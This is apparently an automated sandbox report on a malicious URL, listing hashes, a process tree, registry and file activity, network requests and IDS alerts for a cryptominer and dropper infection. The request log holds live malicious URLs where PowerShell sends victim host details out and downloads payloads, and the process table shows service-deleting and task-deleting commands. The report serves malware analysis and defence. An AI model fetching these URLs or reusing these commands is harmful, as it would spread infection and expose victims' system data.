| URL: | http://t.awcna.com/ipc.jsp?h\ |
| Full analysis: | https://app.any.run/tasks/83983e71-9673-400a-bf36-e6f7aeb601c0 |
| Verdict: | Malicious activity |
| Threats: | Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. |
| Analysis date: | December 01, 2019, 07:12:58 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MD5: | E3795ECAAC1D276D34BA43ECC05CC720 |
| SHA1: | EEE8B22724F29C30B737C87092373F5D72DC9E94 |
| SHA256: | 1B489760A16DA253D8300EDFE7328C270CE7F502E05EEBEA0411AE43F6A31A04 |
| SSDEEP: | 3:N1KKLE1LiGzwr:CKLC+c0 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 236 | "C:\Windows\system32\sc.exe" Delete WinHelpSvcs | C:\Windows\system32\sc.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: A tool to aid in developing services for WindowsNT Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | |||||||||||||||
| 252 | "C:\Windows\system32\sc.exe" Config system Start= Disabled | C:\Windows\system32\sc.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: A tool to aid in developing services for WindowsNT Exit code: 1060 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 284 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\cbkbddr4.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) Modules
| |||||||||||||||
| 292 | "C:\Windows\system32\sc.exe" Stop system | C:\Windows\system32\sc.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: A tool to aid in developing services for WindowsNT Exit code: 1060 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 332 | "C:\Windows\system32\sc.exe" Delete WWW.DDOS.CN.COM | C:\Windows\system32\sc.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: A tool to aid in developing services for WindowsNT Exit code: 1060 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 332 | "C:\Windows\system32\sc.exe" Delete "NetMsmqActiv Media NVIDIA" | C:\Windows\system32\sc.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: A tool to aid in developing services for WindowsNT Exit code: 1060 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 388 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1016,13327520542302318643,14185662005431868472,131072 --enable-features=PasswordImport --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=2665583496820128779 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2224 /prefetch:1 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 75.0.3770.100 Modules
| |||||||||||||||
| 392 | "C:\Windows\system32\sc.exe" Config "Windows Managers" Start= Disabled | C:\Windows\system32\sc.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: A tool to aid in developing services for WindowsNT Exit code: 1060 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 392 | "C:\Windows\system32\schtasks.exe" /Delete /TN LimeRAT-Admin /F | C:\Windows\system32\schtasks.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 408 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1016,13327520542302318643,14185662005431868472,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=14044514532461790662 --mojo-platform-channel-handle=4016 --ignored=" --type=renderer " /prefetch:8 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 75.0.3770.100 Modules
| |||||||||||||||
| (PID) Process: | (2280) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon |
| Operation: | write | Name: | failed_count |
Value: 0 | |||
| (PID) Process: | (2280) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon |
| Operation: | write | Name: | state |
Value: 2 | |||
| (PID) Process: | (2280) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty |
| Operation: | write | Name: | StatusCodes |
Value: | |||
| (PID) Process: | (2280) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty |
| Operation: | write | Name: | StatusCodes |
Value: 01000000 | |||
| (PID) Process: | (2280) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon |
| Operation: | write | Name: | state |
Value: 1 | |||
| (PID) Process: | (2160) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes |
| Operation: | write | Name: | 2280-13219658005621375 |
Value: 259 | |||
| (PID) Process: | (2280) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96} |
| Operation: | write | Name: | dr |
Value: 1 | |||
| (PID) Process: | (2280) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome |
| Operation: | write | Name: | UsageStatsInSample |
Value: 0 | |||
| (PID) Process: | (2280) chrome.exe | Key: | HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes |
| Operation: | delete value | Name: | 1512-13197841398593750 |
Value: 0 | |||
| (PID) Process: | (2280) chrome.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96} |
| Operation: | write | Name: | usagestats |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2280 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\2c9e21a9-42d1-4152-b348-badfb54b60d1.tmp | — | |
MD5:— | SHA256:— | |||
| 2280 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000020.dbtmp | — | |
MD5:— | SHA256:— | |||
| 2280 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old~RF39d30a.TMP | text | |
MD5:— | SHA256:— | |||
| 2280 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old | text | |
MD5:— | SHA256:— | |||
| 2280 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.old | — | |
MD5:— | SHA256:— | |||
| 2280 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old | text | |
MD5:— | SHA256:— | |||
| 2280 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF39d329.TMP | text | |
MD5:— | SHA256:— | |||
| 2280 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 | — | |
MD5:— | SHA256:— | |||
| 2280 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.old | text | |
MD5:— | SHA256:— | |||
| 2280 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\MANIFEST-000001 | — | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3544 | powershell.exe | GET | 200 | 128.199.193.70:80 | http://down.ackng.com/me3.bin?ID=USER-PC&GUID=D103199D-3C3F-AB45-A928-AB014D429B1F&MAC=52:54:00:4A:04:AF&OS=6.1.7601&BIT=32&USER=admin&DOMAIN=WORKGROUP&D=&CD=Standard%20VGA%20Graphics%20Adapter&MEM=4&P=0&FI=0&FM=0&IF=0&MF=0&MV=&HR=&UP=3947.687&_T=1575184565.55692 | SG | binary | 1.75 Mb | malicious |
960 | powershell.exe | GET | 200 | 27.102.70.147:80 | http://t.awcna.com/report.jsp?ID=USER-PC&GUID=D103199D-3C3F-AB45-A928-AB014D429B1F&MAC=52:54:00:4A:04:AF&OS=6.1.7601&BIT=32&USER=admin&DOMAIN=WORKGROUP&D=&CD=Standard%20VGA%20Graphics%20Adapter&MEM=4&P=0&FI=0&FM=0&IF=0&MF=0&MV=&HR=&UP=3947.687&_T=1575184565.55692 | KR | text | 606 b | malicious |
960 | powershell.exe | GET | 200 | 27.102.70.147:80 | http://t.awcna.com/v.jsp?ipc_20191201?ID=USER-PC&GUID=D103199D-3C3F-AB45-A928-AB014D429B1F&MAC=52:54:00:4A:04:AF&OS=6.1.7601&BIT=32&_T=1575184563.88505 | KR | text | 6.34 Kb | malicious |
2484 | powershell.exe | GET | 200 | 128.199.193.70:80 | http://down.ackng.com/wf.cab | SG | compressed | 2.30 Mb | malicious |
2080 | chrome.exe | GET | 302 | 216.58.206.14:80 | http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOTRmQUFXVHlhaGJaUTdMLWtCSkNJUl9ZQQ/1.0.0.5_nmmhkkegccagdldgiimedpiccmgmieda.crx | US | html | 511 b | whitelisted |
2080 | chrome.exe | GET | 302 | 216.58.206.14:80 | http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOWVmQUFXS041NV9ZVXlJVWwxbGc5TUM4dw/7519.422.0.3_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx | US | html | 516 b | whitelisted |
2500 | powershell.exe | GET | 302 | 79.124.78.105:80 | http://t.tr2q.com.com/v.js | BG | — | — | malicious |
2484 | powershell.exe | GET | 200 | 128.199.193.70:80 | http://down.ackng.com/if.bin?ID=USER-PC&GUID=D103199D-3C3F-AB45-A928-AB014D429B1F&MAC=52:54:00:4A:04:AF&OS=6.1.7601&BIT=32&USER=admin&DOMAIN=WORKGROUP&D=&CD=Standard%20VGA%20Graphics%20Adapter&MEM=4&P=0&FI=0&FM=0&IF=0&MF=0&MV=&HR=&UP=3947.687&_T=1575184565.55692 | SG | text | 186 Kb | malicious |
2080 | chrome.exe | GET | 200 | 84.15.64.140:80 | http://r1---sn-cpux-8ov6.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOTRmQUFXVHlhaGJaUTdMLWtCSkNJUl9ZQQ/1.0.0.5_nmmhkkegccagdldgiimedpiccmgmieda.crx?cms_redirect=yes&mip=85.206.166.82&mm=28&mn=sn-cpux-8ov6&ms=nvh&mt=1575184347&mv=u&mvi=0&pl=23&shardbypass=yes | LT | crx | 293 Kb | whitelisted |
960 | powershell.exe | GET | 200 | 27.102.70.147:80 | http://t.awcna.com/v.js | KR | text | 2.61 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2080 | chrome.exe | 172.217.18.3:443 | clientservices.googleapis.com | Google Inc. | US | whitelisted |
2080 | chrome.exe | 172.217.16.174:443 | sb-ssl.google.com | Google Inc. | US | whitelisted |
2080 | chrome.exe | 172.217.16.141:443 | accounts.google.com | Google Inc. | US | suspicious |
2080 | chrome.exe | 172.217.22.99:443 | ssl.gstatic.com | Google Inc. | US | whitelisted |
2080 | chrome.exe | 216.58.207.36:443 | www.google.com | Google Inc. | US | whitelisted |
2080 | chrome.exe | 172.217.21.195:443 | www.google.lt | Google Inc. | US | whitelisted |
3988 | gup.exe | 104.31.89.28:443 | notepad-plus-plus.org | Cloudflare Inc | US | shared |
2080 | chrome.exe | 27.102.70.147:80 | t.awcna.com | DAOU TECHNOLOGY | KR | malicious |
— | — | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2080 | chrome.exe | 172.217.16.170:443 | fonts.googleapis.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
t.awcna.com |
| malicious |
clientservices.googleapis.com |
| whitelisted |
accounts.google.com |
| shared |
sb-ssl.google.com |
| whitelisted |
www.google.com |
| malicious |
ssl.gstatic.com |
| whitelisted |
notepad-plus-plus.org |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
www.google.lt |
| whitelisted |
fonts.googleapis.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
2080 | chrome.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell.MemoryStream.Stager |
960 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell.MemoryStream.Stager |
960 | powershell.exe | A Network Trojan was detected | AV TROJAN Occamy CoinMiner CnC Beacon |
960 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanDropper:Win32/Fakewmi.A |
960 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] PowerShell.MemoryStream.Stager |
960 | powershell.exe | A Network Trojan was detected | AV TROJAN Occamy CoinMiner CnC Beacon |
960 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanDropper:Win32/Fakewmi.A |
3544 | powershell.exe | A Network Trojan was detected | AV TROJAN Occamy CoinMiner CnC Beacon |
3544 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] TrojanDropper:Win32/Fakewmi.A |
2484 | powershell.exe | A Network Trojan was detected | AV TROJAN Occamy CoinMiner CnC Beacon |
Process | Message |
|---|---|
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
|
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
|
notepad++.exe | 42C4C5846BB675C74E2B2C90C69AB44366401093
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|